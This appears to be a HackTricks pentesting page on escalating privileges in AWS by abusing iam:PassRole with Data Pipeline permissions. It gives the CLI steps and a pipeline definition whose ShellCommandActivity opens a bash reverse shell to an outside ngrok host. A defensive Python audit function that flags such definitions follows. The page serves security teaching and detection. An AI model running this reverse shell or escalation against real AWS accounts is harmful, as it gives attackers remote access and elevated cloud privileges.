# AWS - Datapipeline Privesc
{{#include ../../../../banners/hacktricks-training.md}}
## datapipeline

For more info about datapipeline check:
{{#ref}}
../../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
{{#endref}}
### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`

Users with these permissions can escalate privileges by creating a Data Pipeline to execute arbitrary commands using the permissions of the assigned role:

```bash
aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
```

After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations:

```json
{
"objects": [
{
"id": "CreateDirectory",
"type": "ShellCommandActivity",
"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn": { "ref": "instance" }
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id": "instance",
"name": "instance",
"type": "Ec2Resource",
"actionOnTaskFailure": "terminate",
"actionOnResourceFailure": "retryAll",
"maximumRetries": "1",
"instanceType": "t2.micro",
"securityGroups": ["default"],
"role": "assumable_datapipeline",
"resourceRole": "assumable_ec2_profile_instance"
}
]
}
```

```bash
aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
    --pipeline-definition file:///pipeline/definition.json
```

The pipeline definition file, crafted by the attacker, includes directives to execute commands or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.

**Potential Impact:** Direct privesc to the EC2 service role specified.
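On the defender side, the definition above is what you would look for in `get-pipeline-definition` output (or in the `PutPipelineDefinition` CloudTrail event): a `ShellCommandActivity` whose `runsOn` points at an `Ec2Resource` carrying an instance profile. The following audit function is an added example, not part of the original page; it assumes the same `{"objects": [...]}` JSON shape shown above and uses a constructed, benign sample definition.

```python
import json

# Constructed sample in the shape of a put-pipeline-definition file
# (benign command; the role names are placeholders, not real resources).
SAMPLE_DEFINITION = {
    "objects": [
        {"id": "Default", "name": "Default", "scheduleType": "ondemand",
         "role": "assumable_datapipeline", "resourceRole": "assumable_datapipeline"},
        {"id": "RunCmd", "type": "ShellCommandActivity",
         "command": "echo hello", "runsOn": {"ref": "instance"}},
        {"id": "instance", "name": "instance", "type": "Ec2Resource",
         "instanceType": "t2.micro", "role": "assumable_datapipeline",
         "resourceRole": "assumable_ec2_profile_instance"},
    ]
}


def audit_pipeline_definition(definition):
    """Flag every ShellCommandActivity and resolve which EC2 resource and
    instance profile (resourceRole) it would execute under.

    Returns a list of dicts, one per shell activity found; an empty list
    means the definition runs no shell commands at all."""
    objects = {o.get("id"): o for o in definition.get("objects", [])}
    default_role = objects.get("Default", {}).get("role")
    findings = []
    for obj in objects.values():
        if obj.get("type") != "ShellCommandActivity":
            continue
        # runsOn references another object by id; resolve it to see the
        # instance profile the command will inherit on the EC2 host.
        target = objects.get(obj.get("runsOn", {}).get("ref"), {})
        findings.append({
            "activity": obj.get("id"),
            # inline "command" or an S3 "scriptUri" can both carry the payload
            "command": obj.get("command") or obj.get("scriptUri"),
            "runs_on": target.get("id"),
            "resource_type": target.get("type"),
            "instance_profile": target.get("resourceRole"),
            "pipeline_role": default_role,
        })
    return findings


if __name__ == "__main__":
    for finding in audit_pipeline_definition(SAMPLE_DEFINITION):
        print(json.dumps(finding, indent=2))
```

Run it over `aws datapipeline get-pipeline-definition` output for each pipeline and alert on any finding whose `instance_profile` is more privileged than the caller of `PutPipelineDefinition` should be.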
{{#include ../../../../banners/hacktricks-training.md}}